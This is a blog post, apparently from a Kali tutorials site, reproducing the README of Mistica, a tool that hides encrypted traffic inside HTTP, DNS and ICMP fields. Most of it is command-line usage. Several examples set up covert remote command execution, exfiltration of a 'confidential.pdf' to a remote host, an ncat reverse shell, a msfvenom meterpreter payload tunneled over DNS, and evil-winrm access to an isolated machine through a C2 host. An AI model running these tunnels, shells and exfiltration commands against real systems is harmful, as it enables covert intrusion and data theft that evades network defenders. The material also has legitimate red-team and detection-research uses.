{"id":11189,"date":"2020-08-11T07:51:03","date_gmt":"2020-08-11T02:21:03","guid":{"rendered":"http:\/\/kalilinuxtutorials.com\/?p=11189"},"modified":"2020-08-11T07:51:03","modified_gmt":"2020-08-11T02:21:03","slug":"mistica","status":"publish","type":"post","link":"https:\/\/kalilinuxtutorials.com\/mistica\/","title":{"rendered":"Mistica : Swiss Army Knife For Arbitrary Communication Over Application Protocols"},"content":{"rendered":"\n<p><strong>Mistica<\/strong> is a tool that allows embedding data into application layer protocol fields, with the goal of establishing a bi-directional channel for arbitrary communications. Currently, encapsulation into HTTP, DNS and ICMP protocols has been implemented, but more protocols are expected to be introduced in the near future.<\/p>\n\n\n\n<p>It has a modular design, built around a custom transport protocol, called SOTP: Simple Overlay Transport Protocol. Data is encrypted, chunked and put into SOTP packets. SOTP packets are encoded and embedded into the desired field of the application protocol, and sent to the other end.<\/p>\n\n\n\n<p>The goal of the SOTP layer is to offer a generic binary transport protocol, with minimal overhead. SOTP packets can be easily hidden or embedded into legitimate application protocols. Also, SOTP makes sure that packets are received by the other end, encrypts the data using RC4 (this may change in the future), and makes sure that information can flow in both directions transparently, by using a polling mechanism.<\/p>\n\n\n\n<p>Modules interact with the SOTP layer for different purposes:<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>Wrap modules or Wrappers: These modules encode \/ decode SOTP packets from \/ into application layer protocols<\/li><li>Overlay modules: These modules communicate over the SOTP channel. 
Examples are: io redirection (like netcat), shell (command execution), port forwarding\u2026<\/li><\/ul>\n\n\n\n<p>Wrapper and overlay modules work together in order to build custom applications, e.g. input redirection over DNS or remote port forwarding over HTTP.<\/p>\n\n\n\n<p>M\u00edstica\u2019s modular design allows for easy development of new modules. Also, the user can easily fork current modules in order to use some custom field or encoding or modify the behavior of an overlay module.<\/p>\n\n\n\n<p>There are two main pieces of software:<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>M\u00edstica server (<code>ms.py<\/code>): Uses modules that act as the server of the desired application layer protocol (HTTP, DNS, ICMP&#8230;). It is also designed in a way that will allow for multiple servers, wrappers and overlays to be run at the same time, with just one instance of <code>ms.py<\/code>, although this feature is not fully implemented yet.<\/li><li>M\u00edstica client (<code>mc.py<\/code>): Uses modules that act as the client of the desired application layer protocol (HTTP, DNS, ICMP&#8230;). It can only use one overlay and one wrapper at the same time.<\/li><\/ul>\n\n\n\n<p class=\"has-background has-text-align-center has-light-green-cyan-background-color\"><strong>Demos<\/strong><\/p>\n\n\n\n<p>You can see some M\u00edstica demos in the following <a href=\"https:\/\/www.youtube.com\/playlist?list=PLyUtb47GNF9wqIwI1DGpX_Fr1IXpXHRqB\">playlist<\/a><\/p>\n\n\n\n<p class=\"has-background has-text-align-center has-light-green-cyan-background-color\"><strong>Dependencies<\/strong><\/p>\n\n\n\n<p>The project has very few dependencies. 
Currently:<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>M\u00edstica Client needs at least Python 3.7<\/li><li>M\u00edstica Server needs at least Python 3.7 and <code>dnslib<\/code>.<\/li><\/ul>\n\n\n\n<p class=\"has-text-color has-background has-vivid-green-cyan-color has-very-dark-gray-background-color\"><strong>python3.7 -m pip install pip --user <br>pip3.7 install dnslib --user<\/strong> <\/p>\n\n\n\n<p>If you don&#8217;t want to install Python on your system, you can use one of the following portable versions:<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><a href=\"https:\/\/www.anaconda.com\/distribution\/#download-section\">https:\/\/www.anaconda.com\/distribution\/#download-section<\/a> (for Windows, Linux and macOS)<\/li><li><a href=\"https:\/\/github.com\/winpython\/winpython\/releases\/tag\/2.1.20190928\">https:\/\/github.com\/winpython\/winpython\/releases\/tag\/2.1.20190928<\/a> (only for Windows)<\/li><\/ul>\n\n\n\n<p class=\"has-background has-text-align-center has-light-green-cyan-background-color\"><strong>Current Modules<\/strong><\/p>\n\n\n\n<p>Overlay modules:<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><code>io<\/code>: Reads from stdin, sends through SOTP connection. Reads from SOTP connection, prints to stdout<\/li><li><code>shell<\/code>: Executes commands received through the SOTP connection and returns the output. Compatible with io module.<\/li><li><code>tcpconnect<\/code>: Connects to TCP port. Reads from socket, sends through SOTP connection. Reads from SOTP connection, sends through socket.<\/li><li><code>tcplisten<\/code>: Binds to TCP port. Reads from socket, sends through SOTP connection. 
Reads from SOTP connection, sends through socket.<\/li><\/ul>\n\n\n\n<p>Wrap modules:<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><code>dns<\/code>: Encodes\/Decodes data in DNS queries\/responses using different methods<\/li><li><code>http<\/code>: Encodes\/Decodes data in HTTP requests\/responses using different methods<\/li><li><code>icmp<\/code>: Encodes\/Decodes data in ICMP echo requests\/responses on data section<\/li><\/ul>\n\n\n\n<p class=\"has-background has-text-align-center has-light-green-cyan-background-color\"><strong>Usage<\/strong><\/p>\n\n\n\n<p><code>ms.py<\/code>: M\u00edstica Server<\/p>\n\n\n\n<p>Here&#8217;s what the help message looks like:<\/p>\n\n\n\n<p class=\"has-text-color has-background has-vivid-green-cyan-color has-very-dark-gray-background-color\">usage: ms.py [-h] [-k KEY] [-l LIST] [-m MODULES] [-w WRAPPER_ARGS]<br>[-o OVERLAY_ARGS] [-s WRAP_SERVER_ARGS]<br><br>Mistica server. Anything is a tunnel if you&#8217;re brave enough. Run without<br>parameters to launch multi-handler mode.<br><br>optional arguments:<br>-h, --help show this help message and exit<br>-k KEY, --key KEY RC4 key used to encrypt the comunications<br>-l LIST, --list LIST Lists modules or parameters. Options are: all,<br>overlays, wrappers, ,<br>-m MODULES, --modules MODULES<br>Module pair in single-handler mode. 
format:<br>&#8216;overlay:wrapper&#8217;<br>-w WRAPPER_ARGS, --wrapper-args WRAPPER_ARGS<br>args for the selected overlay module (Single-handler<br>mode)<br>-o OVERLAY_ARGS, --overlay-args OVERLAY_ARGS<br>args for the selected wrapper module (Single-handler<br>mode)<br>-s WRAP_SERVER_ARGS, --wrap-server-args WRAP_SERVER_ARGS<br>args for the selected wrap server (Single-handler<br>mode)<br>-v, --verbose Level of verbosity in logger (no -v None, -v Low, -vv<br>Medium, -vvv High)<\/p>\n\n\n\n<p>There are two main modes in M\u00edstica Server:<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><strong>Single Handler Mode<\/strong>: When <code>ms.py<\/code> is launched with parameters, it allows a single overlay module to interact with a single wrapper module.<\/li><li><strong>Multi-handler Mode:<\/strong> (Not published yet) When <code>ms.py<\/code> is run without parameters, the user enters an interactive console, where multiple overlay and wrapper modules may be launched. These modules will be able to interact with each other, with few restrictions.<\/li><\/ul>\n\n\n\n<p><code>mc.py<\/code>: M\u00edstica client<\/p>\n\n\n\n<p>Here&#8217;s what the help message looks like:<\/p>\n\n\n\n<p class=\"has-text-color has-background has-vivid-green-cyan-color has-very-dark-gray-background-color\">usage: mc.py [-h] [-k KEY] [-l LIST] [-m MODULES] [-w WRAPPER_ARGS]<br>[-o OVERLAY_ARGS]<br><br>Mistica client.<br><br>optional arguments:<br>-h, --help show this help message and exit<br>-k KEY, --key KEY RC4 key used to encrypt the comunications<br>-l LIST, --list LIST Lists modules or parameters. Options are: all,<br>overlays, wrappers, ,<br>-m MODULES, --modules MODULES<br>Module pair. 
Format: &#8216;overlay:wrapper&#8217;<br>-w WRAPPER_ARGS, --wrapper-args WRAPPER_ARGS<br>args for the selected overlay module<br>-o OVERLAY_ARGS, --overlay-args OVERLAY_ARGS<br>args for the selected wrapper module<br>-v, --verbose Level of verbosity in logger (no -v None, -v Low, -vv<br>Medium, -vvv High)<\/p>\n\n\n\n<p class=\"has-background has-text-align-center has-light-green-cyan-background-color\"><strong>Parameters<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><code><strong>-l, --list<\/strong><\/code> is used to either list <code>all<\/code> modules, only list one type: (<code>overlays<\/code> or <code>wrappers<\/code>) or list the parameters that a certain module can accept through <code>-o<\/code>, <code>-w<\/code> or <code>-s<\/code>.<\/li><li><code><strong>-k, --key<\/strong><\/code> is used to specify the key that will be used to encrypt the overlay communication. This must be the same in client and server and is currently mandatory. This may change in the future if secret-sharing schemes are implemented.<\/li><li><code><strong>-m, --modules<\/strong><\/code> is used to specify which module pair you want to use. You must use the following format: <strong>overlay_module<\/strong> + <strong>:<\/strong> + <strong>wrap_module<\/strong>. This parameter is also mandatory.<\/li><li><code><strong>-w, --wrapper-args<\/strong><\/code> allows you to specify a particular configuration for the wrap module.<\/li><li><code><strong>-o, --overlay-args<\/strong><\/code> allows you to specify a particular configuration for the overlay module.<\/li><li><code><strong>-s, --wrap-server-args<\/strong><\/code> is only present on <code>ms.py<\/code>. It allows you to specify a particular configuration for the wrap server. 
Each wrap module has a dependency on a wrap server, and both configurations can be tuned.<\/li><\/ul>\n\n\n\n<p class=\"has-background has-text-align-center has-light-green-cyan-background-color\"><strong>Examples &amp; Advanced use<\/strong><\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\"><p>Remember that you can see all of the accepted parameters of a module by typing <code><strong>-l &lt;module_name&gt;<\/strong><\/code> (e.g. <code><strong>.\/ms.py -l dns<\/strong><\/code>). Also remember to use a long and complex key to protect your communications!<\/p><\/blockquote>\n\n\n\n<p class=\"has-background has-text-align-center has-light-green-cyan-background-color\"><strong>HTTP<\/strong><\/p>\n\n\n\n<p>In order to illustrate the different methods of HTTP encapsulation, the IO redirection overlay module (<code>io<\/code>) will be used for every example.<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>HTTP GET method with b64 encoding in the default URI, using localhost and port 8080 (default values).<ul><li>M\u00edstica Server: <code><strong>.\/ms.py -m io:http -k \"rc4testkey\"<\/strong><\/code><\/li><li>M\u00edstica Client: <code><strong>.\/mc.py -m io:http -k \"rc4testkey\"<\/strong><\/code><\/li><\/ul><\/li><li>HTTP GET method with b64 encoding in the default URI, <strong>specifying IP address and port<\/strong>.<ul><li>M\u00edstica Server: <code><strong>.\/ms.py -m io:http -k \"rc4testkey\" -s \"--hostname x.x.x.x --port 10000\"<\/strong><\/code><\/li><li>M\u00edstica Client: <code><strong>.\/mc.py -m io:http -k \"rc4testkey\" -w \"--hostname x.x.x.x --port 10000\"<\/strong><\/code><\/li><\/ul><\/li><li>HTTP GET method with b64 encoding in <strong>custom URI<\/strong>, using localhost and port 8080 (default values).<ul><li>M\u00edstica Server: <code><strong>.\/ms.py -m io:http -k \"rc4testkey\" -w \"--uri \/?token=\"<\/strong><\/code><\/li><li>M\u00edstica Client: <code><strong>.\/mc.py -m io:http -k \"rc4testkey\" -w 
\"--uri \/?token=\"<\/strong><\/code><\/li><\/ul><\/li><li>HTTP GET method with b64 encoding in <strong>custom header<\/strong>, using localhost and port 8080 (default values).<ul><li>M\u00edstica Server: <code><strong>.\/ms.py -m io:http -k \"rc4testkey\" -w \"--header laravel_session\"<\/strong><\/code><\/li><li>M\u00edstica Client: <code><strong>.\/mc.py -m io:http -k \"rc4testkey\" -w \"--header laravel_session\"<\/strong><\/code><\/li><\/ul><\/li><li>HTTP <strong>POST<\/strong> method with b64 encoding in default field, using localhost and port 8080 (default values).<ul><li>M\u00edstica Server: <code><strong>.\/ms.py -m io:http -k \"rc4testkey\" -w \"--method POST\"<\/strong><\/code><\/li><li>M\u00edstica Client: <code><strong>.\/mc.py -m io:http -k \"rc4testkey\" -w \"--method POST\"<\/strong><\/code><\/li><\/ul><\/li><li>HTTP <strong>POST<\/strong> method with b64 encoding in <strong>custom header<\/strong>, using localhost and port 8080 (default values).<ul><li>M\u00edstica Server: <code><strong>.\/ms.py -m io:http -k \"rc4testkey\" -w \"--method POST --header Authorization\"<\/strong><\/code><\/li><li>M\u00edstica Client: <code><strong>.\/mc.py -m io:http -k \"rc4testkey\" -w \"--method POST --header Authorization\"<\/strong><\/code><\/li><\/ul><\/li><li>HTTP <strong>POST<\/strong> method with b64 encoding in <strong>custom field<\/strong>, using localhost and port 8080 (default values).<ul><li>M\u00edstica Server: <code><strong>.\/ms.py -m io:http -k \"rc4testkey\" -w \"--method POST --post-field data\"<\/strong><\/code><\/li><li>M\u00edstica Client: <code><strong>.\/mc.py -m io:http -k \"rc4testkey\" -w \"--method POST --post-field data\"<\/strong><\/code><\/li><\/ul><\/li><li>HTTP <strong>POST<\/strong> method with b64 encoding in <strong>custom field, with custom packet size, custom retries, custom timeout and sepcifying IP and port<\/strong>:<ul><li>M\u00edstica Server: <code><strong>.\/ms.py -m io:http -k \"rc4testkey\" -w \"--method POST 
--post-field data --max-size 30000 --max-retries 10\" -s \"--hostname 0.0.0.0 --port 8088 --timeout 30\"<\/strong><\/code><\/li><li>M\u00edstica Client: <code><strong>.\/mc.py -m io:http -k \"rc4testkey\" -w \"--method POST --post-field data --max-size 30000 --max-retries 10 --poll-delay 10 --response-timeout 30 --hostname x.x.x.x --port 8088\"<\/strong><\/code><\/li><\/ul><\/li><li>HTTP <strong>POST<\/strong> method with b64 encoding in <strong>custom field<\/strong>, <strong>using a custom error template<\/strong>, using localhost and port 8080 (default values).<ul><li>M\u00edstica Server: <code><strong>.\/ms.py -m io:http -k \"rc4testkey\" -w \"--method POST --post-field data\" -s \"--error-file \/tmp\/custom_error_template.html --error-code 408\"<\/strong><\/code><\/li><li>M\u00edstica Client: <code><strong>.\/mc.py -m io:http -k \"rc4testkey\" -w \"--method POST --post-field data\"<\/strong><\/code><\/li><\/ul><\/li><li>HTTP GET method with b64 encoding in the default URI, using <strong>custom HTTP response code<\/strong> and using localhost and port 8080 (default values):<ul><li>M\u00edstica Server: <code><strong>.\/ms.py -m io:http -k test -w \"--success-code 302\"<\/strong><\/code><\/li><li>M\u00edstica Client: <code><strong>.\/mc.py -m io:http -k test -w \"--success-code 302\"<\/strong><\/code><\/li><\/ul><\/li><\/ul>\n\n\n\n<p class=\"has-background has-text-align-center has-light-green-cyan-background-color\"><strong>DNS<\/strong><\/p>\n\n\n\n<p>In order to illustrate the different methods of DNS encapsulation, the IO redirection overlay module (<code>io<\/code>) will be used for every example.<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>TXT query, using localhost and port 5353 (default values):<ul><li>M\u00edstica Server: <code><strong>.\/ms.py -m io:dns -k \"rc4testkey\"<\/strong><\/code><\/li><li>M\u00edstica Client: <code><strong>.\/mc.py -m io:dns -k \"rc4testkey\"<\/strong><\/code><\/li><\/ul><\/li><li>NS query, using localhost and port 5353 
(default values):<ul><li>M\u00edstica Server: <code><strong>.\/ms.py -m io:dns -k \"rc4testkey\" -w \"--queries NS\"<\/strong><\/code><\/li><li>M\u00edstica Client: <code><strong>.\/mc.py -m io:dns -k \"rc4testkey\" -w \"--query NS\"<\/strong><\/code><\/li><\/ul><\/li><li>CNAME query, using localhost and port 5353 (default values):<ul><li>M\u00edstica Server: <code><strong>.\/ms.py -m io:dns -k \"rc4testkey\" -w \"--queries CNAME\"<\/strong><\/code><\/li><li>M\u00edstica Client: <code><strong>.\/mc.py -m io:dns -k \"rc4testkey\" -w \"--query CNAME\"<\/strong><\/code><\/li><\/ul><\/li><li>MX query, using localhost and port 5353 (default values):<ul><li>M\u00edstica Server: <code><strong>.\/ms.py -m io:dns -k \"rc4testkey\" -w \"--queries MX\"<\/strong><\/code><\/li><li>M\u00edstica Client: <code><strong>.\/mc.py -m io:dns -k \"rc4testkey\" -w \"--query MX\"<\/strong><\/code><\/li><\/ul><\/li><li>SOA query, using localhost and port 5353 (default values):<ul><li>M\u00edstica Server: <code><strong>.\/ms.py -m io:dns -k \"rc4testkey\" -w \"--queries SOA\"<\/strong><\/code><\/li><li>M\u00edstica Client: <code><strong>.\/mc.py -m io:dns -k \"rc4testkey\" -w \"--query SOA\"<\/strong><\/code><\/li><\/ul><\/li><li>TXT query, using localhost and port 5353 (default values) and <strong>custom domains<\/strong>:<ul><li>M\u00edstica Server: <code><strong>.\/ms.py -m io:dns -k \"rc4testkey\" -w \"--domains mistica.dev sotp.es\"<\/strong><\/code><\/li><li>M\u00edstica Client:<ul><li><code><strong>.\/mc.py -m io:dns -k \"rc4testkey\" -w \"--domain sotp.es\"<\/strong><\/code><\/li><li><code><strong>.\/mc.py -m io:dns -k \"rc4testkey\" -w \"--domain mistica.dev\"<\/strong><\/code><\/li><\/ul><\/li><\/ul><\/li><li>TXT query, specifying port and hostname:<ul><li>M\u00edstica Server: <code><strong>.\/ms.py -m io:dns -k \"rc4testkey\" -s \"--hostname 0.0.0.0 --port 1337\"<\/strong><\/code><\/li><li>M\u00edstica Client: <code><strong>.\/mc.py -m io:dns -k \"rc4testkey\" -w \"--hostname 
x.x.x.x --port 1337\"<\/strong><\/code><\/li><\/ul><\/li><li>TXT query, using multiple subdomains:<ul><li>M\u00edstica Server: <code><strong>.\/ms.py -m io:dns -k \"rc4testkey\"<\/strong><\/code><\/li><li>M\u00edstica Client: <code><strong>.\/mc.py -m io:dns -k \"rc4testkey\" -w \"--multiple --max-size 169\"<\/strong><\/code><\/li><\/ul><\/li><\/ul>\n\n\n\n<p class=\"has-background has-text-align-center has-light-green-cyan-background-color\"><strong>ICMP<\/strong><\/p>\n\n\n\n<p>By default, when the Linux kernel receives an ICMP echo request packet, it automatically responds with an ICMP echo reply packet (without giving us any option to reply). That&#8217;s why we have to disable the kernel&#8217;s ICMP responses to be able to send our own, with data that differs from that sent by the client. To do this, we do the following:<\/p>\n\n\n\n<p>Disable automatic ICMP responses by the kernel (<em>root required<\/em>) by editing the <code>\/etc\/sysctl.conf<\/code> file:<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>Add the following line to your \/etc\/sysctl.conf:<\/li><\/ul>\n\n\n\n<p class=\"has-text-color has-background has-vivid-green-cyan-color has-very-dark-gray-background-color\">net.ipv4.icmp_echo_ignore_all=1\n<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>Then run <code>sysctl -p<\/code> for the change to take effect.<\/li><\/ul>\n\n\n\n<p>Now, in order to illustrate the different methods of ICMP encapsulation, the IO redirection overlay module (<code>io<\/code>) will be used for every example.<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>ICMP Data Section, using interface eth0:<ul><li>M\u00edstica Server: <code><strong>.\/ms.py -m io:icmp -k \"rc4testkey\" -s \"--iface eth0\"<\/strong><\/code><\/li><li>M\u00edstica Client: <code><strong>.\/mc.py -m io:icmp -k \"rc4testkey\" -w \"--hostname x.x.x.x\"<\/strong><\/code><\/li><\/ul><\/li><\/ul>\n\n\n\n<p class=\"has-background has-text-align-center has-light-green-cyan-background-color\"><strong>Shell &amp; IO<\/strong><\/p>\n\n\n\n<p>You can get remote 
command execution using m\u00edstica over a custom channel, by combining <code>io<\/code> and <code>shell<\/code> modules. Examples:<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>Executing commands on client system over DNS using TXT query.<ul><li>M\u00edstica Server: <code><strong>sudo .\/ms.py -m io:dns -k \"rc4testkey\" -s \"--hostname x.x.x.x --port 53\"<\/strong><\/code><\/li><li>M\u00edstica Client: <code><strong>.\/mc.py -m shell:dns -k \"rc4testkey\" -w \"--hostname x.x.x.x --port 53\"<\/strong><\/code><\/li><\/ul><\/li><li>Executing commands on server system over HTTP using GET requests:<ul><li>M\u00edstica Server: <code><strong>.\/ms.py -m shell:http -k \"rc4testkey\" -s \"--hostname x.x.x.x --port 8000\"<\/strong><\/code><\/li><li>M\u00edstica Client: <code><strong>.\/mc.py -m io:http -k \"rc4testkey\" -w \"--hostname x.x.x.x --port 8000\"<\/strong><\/code><\/li><\/ul><\/li><li>Executing commands on client system over ICMP:<ul><li>M\u00edstica Server: <code><strong>.\/ms.py -m io:icmp -k \"rc4testkey\" -s \"--iface eth0\"<\/strong><\/code><\/li><li>M\u00edstica Client: <code><strong>.\/mc.py -m shell:icmp -k \"rc4testkey\" -w \"--hostname x.x.x.x\"<\/strong><\/code><\/li><\/ul><\/li><li>Exfiltrating files via HTTP using the IO module and redirect operators:<ul><li>M\u00edstica Server: <code><strong>.\/ms.py -m io:http -s \"--hostname 0.0.0.0 --port 80\" -k \"rc4testkey\" -vv &gt; confidential.pdf<\/strong><\/code><\/li><li>M\u00edstica Client (<strong>important to run from the cmd<\/strong>): <code><strong>type confidential.pdf | E:\\Mistica\\WPy64-3741\\python-3.7.4.amd64\\python.exe .\\mc.py -m io:http -w \"--hostname x.x.x.x --port 80\" -k \"rc4testkey\" -vv<\/strong><\/code><\/li><\/ul><\/li><\/ul>\n\n\n\n<p class=\"has-background has-text-align-center has-light-green-cyan-background-color\"><strong>Port forwarding with tcpconnect and tcplisten<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>Remote port forwarding (seen from server) over HTTP. 
Address <code><strong>127.0.0.1:4444<\/strong><\/code> on the client will be forwarded to address <code><strong>127.0.0.1:5555<\/strong><\/code> on the server. There must be already something listening on <code>5555<\/code>.<ul><li>M\u00edstica Server: <code><strong>.\/ms.py -m tcpconnect:http -k \"rc4testkey\" -s \"--hostname x.x.x.x --port 8000\" -o \"--address 127.0.0.1 --port 5555\"<\/strong><\/code><\/li><li>M\u00edstica Client: <code><strong>.\/mc.py -m tcplisten:http -k \"rc4testkey\" -w \"--hostname x.x.x.x --port 8000\" -o \"--address 127.0.0.1 --port 4444\"<\/strong><\/code><\/li><\/ul><\/li><li>Local port forwarding (seen from server) over DNS. Address <code>127.0.0.1:4444<\/code> on the server will be forwarded to address <code>127.0.0.1:5555<\/code> on the client. There must be already something listening on <code>5555<\/code>.<ul><li>M\u00edstica Server: <code><strong>sudo .\/ms.py -m tcplisten:dns -k \"rc4testkey\" -s \"--hostname x.x.x.x --port 53\" -o \"--address 127.0.0.1 --port 4444\"<\/strong><\/code><\/li><li>M\u00edstica Client: <code><strong>.\/mc.py -m tcpconnect:dns -k \"rc4testkey\" -w \"--hostname x.x.x.x --port 53\" -o \"--address 127.0.0.1 --port 5555\"<\/strong><\/code><\/li><\/ul><\/li><li>HTTP reverse shell using netcat on linux client.<ul><li>Netcat Listener (on server): <strong><code>nc -nlvp 5555<\/code><\/strong><\/li><li><strong>M\u00edstica Server: <code>.\/ms.py -m tcpconnect:http -k \"rc4testkey\" -s \"--hostname x.x.x.x --port 8000\" -o \"--address 127.0.0.1 --port 5555\"<\/code><\/strong><\/li><li>M\u00edstica Client: <code><strong>.\/mc.py -m tcplisten:http -k \"rc4testkey\" -w \"--hostname x.x.x.x --port 8000\" -o \"--address 127.0.0.1 --port 4444\"<\/strong><\/code><\/li><li>Netcat Shell (on linux client): <code><strong>ncat -nve \/bin\/bash 127.0.0.1 4444<\/strong><\/code><\/li><\/ul><\/li><li>Running <code><strong>meterpreter_reverse_tcp<\/strong><\/code> (linux) over DNS using port forwarding. 
Payload generated with <code><strong>msfvenom -p linux\/x64\/meterpreter_reverse_tcp LPORT=4444 LHOST=127.0.0.1 -f elf -o meterpreter_reverse_tcp_localhost_4444.bin<\/strong><\/code><ul><li>Run <code>msfconsole<\/code> on server and launch handler with: <code>handler <strong>-p linux\/x64\/meterpreter_reverse_tcp -H 127.0.0.1 -P 5555<\/strong><\/code><\/li><li>M\u00edstica Server: <code><strong>sudo .\/ms.py -m tcpconnect:dns -k \"rc4testkey\" -s \"--hostname x.x.x.x --port 53\" -o \"--address 127.0.0.1 --port 5555\"<\/strong><\/code><\/li><li>M\u00edstica Client: <code><strong>.\/mc.py -m tcplisten:dns -k \"rc4testkey\" -w \"--hostname x.x.x.x --port 53\" -o \"--address 127.0.0.1 --port 4444\"<\/strong><\/code><\/li><li>Run meterpreter on client: <code><strong>.\/meterpreter_reverse_tcp_localhost_4444.bin<\/strong><\/code><\/li><\/ul><\/li><li><a href=\"https:\/\/github.com\/Hackplayers\/evil-winrm\">EvilWinrm<\/a> over ICMP using a jumping machine to access an isolated machine.<ul><li>Mistica Server: <code><strong>.\/ms.py -m tcplisten:icmp -s \"--iface eth0\" -k \"rc4testkey\" -o \"--address 127.0.0.1 --port 5555 --persist\" -vv<\/strong><\/code><\/li><li>Mistica Client: <code><strong>python.exe .\\mc.py -m tcpconnect:icmp -w \"--hostname x.x.x.x\" -k \"rc4testkey\" -o \"--address x.x.x.x --port 5985 --persist\" -vv<\/strong><\/code><\/li><li>EvilWinrm Console (on C2 machine): <code><strong>evil-winrm -u Administrador -i 127.0.0.1 -P 5555<\/strong><\/code><\/li><\/ul><\/li><\/ul>\n\n\n\n<p class=\"has-background has-text-align-center has-light-green-cyan-background-color\"><strong>Docker<\/strong><\/p>\n\n\n\n<p>A Docker image has been created for local use. This avoids having to install Python or dnslib just to test the tool. It is also useful for debugging, because it avoids the noise generated by other local applications. 
To build it, follow these steps:<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>First, build the image with:<\/li><\/ul>\n\n\n\n<p class=\"has-text-color has-background has-vivid-green-cyan-color has-very-dark-gray-background-color\">sudo docker build --tag mistica:latest .\n<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>Second, create the network with:<\/li><\/ul>\n\n\n\n<p class=\"has-text-color has-background has-vivid-green-cyan-color has-very-dark-gray-background-color\">sudo docker network create misticanw\n<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>Third, run the server with:<\/li><\/ul>\n\n\n\n<p class=\"has-text-color has-background has-vivid-green-cyan-color has-very-dark-gray-background-color\">sudo docker run --network misticanw --sysctl net.ipv4.icmp_echo_ignore_all=1 -v $(pwd):\/opt\/Mistica -it mistica \/bin\/bash\n<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>Fourth, run the client with:<\/li><\/ul>\n\n\n\n<p class=\"has-text-color has-background has-vivid-green-cyan-color has-very-dark-gray-background-color\">sudo docker run --network misticanw -v $(pwd):\/opt\/Mistica -it mistica \/bin\/bash\n<\/p>\n\n\n\n<p class=\"has-background has-text-align-center has-light-green-cyan-background-color\"><strong>Future Work<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>Transparent Diffie-Hellman key generation for SOTP protocol<\/li><li>Payload Generator: Instead of using <code>.\/mc.py<\/code>, this will allow generating specific and minimalistic standalone binary clients with hardcoded parameters.<\/li><li>Multi-Handler mode: Interactive mode for <code>ms.py<\/code>. This will let the user combine more than one overlay with more than one wrapper and more than one wrap module per wrap server.<\/li><li>Module development documentation for custom module development. 
This is discouraged right now as module specification is still under development.<\/li><li>Next modules:<ul><li>HTTPS wrapper<\/li><li>SMB wrapper<\/li><li>RAT and RAT handler overlay<\/li><li>SOCKS proxy and dynamic port forwarding overlay<\/li><li>File Transfer overlay<\/li><\/ul><\/li><li>Custom HTTP templates for more complex encapsulation<\/li><li>SOTP protocol specification documentation for custom clients or servers. This is discouraged right now as the protocol is still under development.<\/li><\/ul>\n\n\n\n<p class=\"has-background has-text-align-center has-light-green-cyan-background-color\"><strong>Authors &amp; License<\/strong><\/p>\n\n\n\n<p>This project has been developed by Carlos Fern\u00e1ndez S\u00e1nchez and Ra\u00fal Caro Teixid\u00f3. The code is released under the GNU General Public License v3.<\/p>\n\n\n\n<p>This project uses third-party open-source code, particularly:<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><a href=\"https:\/\/github.com\/scott-griffiths\/bitstring\">Bitstring<\/a> developed by Scott Griffiths.<\/li><li><a href=\"https:\/\/github.com\/DavidBuchanan314\/rc4\">A RC4 binary-safe<\/a> developed by David Buchanan.<\/li><li><a href=\"https:\/\/github.com\/vlasebian\/simple-dns-client\">A DNS Client without dependencies<\/a> developed by Vlad Vitan.<\/li><li><a href=\"https:\/\/github.com\/rcaroncd\/ICMPack\/\">A ICMP Server and Client without dependencies<\/a> developed by Raul Caro.<\/li><\/ul>\n\n\n\n<div class=\"wp-block-buttons aligncenter is-layout-flex wp-block-buttons-is-layout-flex\">\n<div class=\"wp-block-button is-style-outline is-style-outline--1\"><a class=\"wp-block-button__link has-background has-vivid-cyan-blue-background-color\" href=\"https:\/\/github.com\/IncideDigital\/Mistica\" target=\"_blank\" rel=\"noreferrer noopener\"><strong>Download<\/strong><\/a><\/div>\n<\/div>\n","protected":false},"excerpt":{"rendered":"<p>Mistica is a tool that allows to embed data into application layer protocol fields, with 
the goal of establishing a bi-directional channel for arbitrary communications. Currently, encapsulation into HTTP, DNS and ICMP protocols has been implemented, but more protocols are expected to be introduced in the near future. It has a modular design, built around [&hellip;]<\/p>\n","protected":false},"author":4,"featured_media":16458,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"fifu_image_url":"https:\/\/1.bp.blogspot.com\/-pF5_m6ub1HY\/XyyJnUXZEHI\/AAAAAAAAHQU\/Cj-XIuC6UGolISWI8cB3_08lmRX-x16iwCLcBGAsYHQ\/s728\/M%25C3%25ADstica%25281%2529.png","fifu_image_alt":"Mistica : Swiss Army Knife For Arbitrary Communication Over Application Protocols","_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[28],"tags":[2090,3284,3285],"class_list":["post-11189","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-kali","tag-mistica","tag-swiss-army","tag-swiss-army-knife-2"],"yoast_head_json":{"title":"Mistica : Swiss Army Knife For Arbitrary Communication","author":"R K","twitter_misc":{"Written by":"R K","Est. reading time":"15 minutes"}}}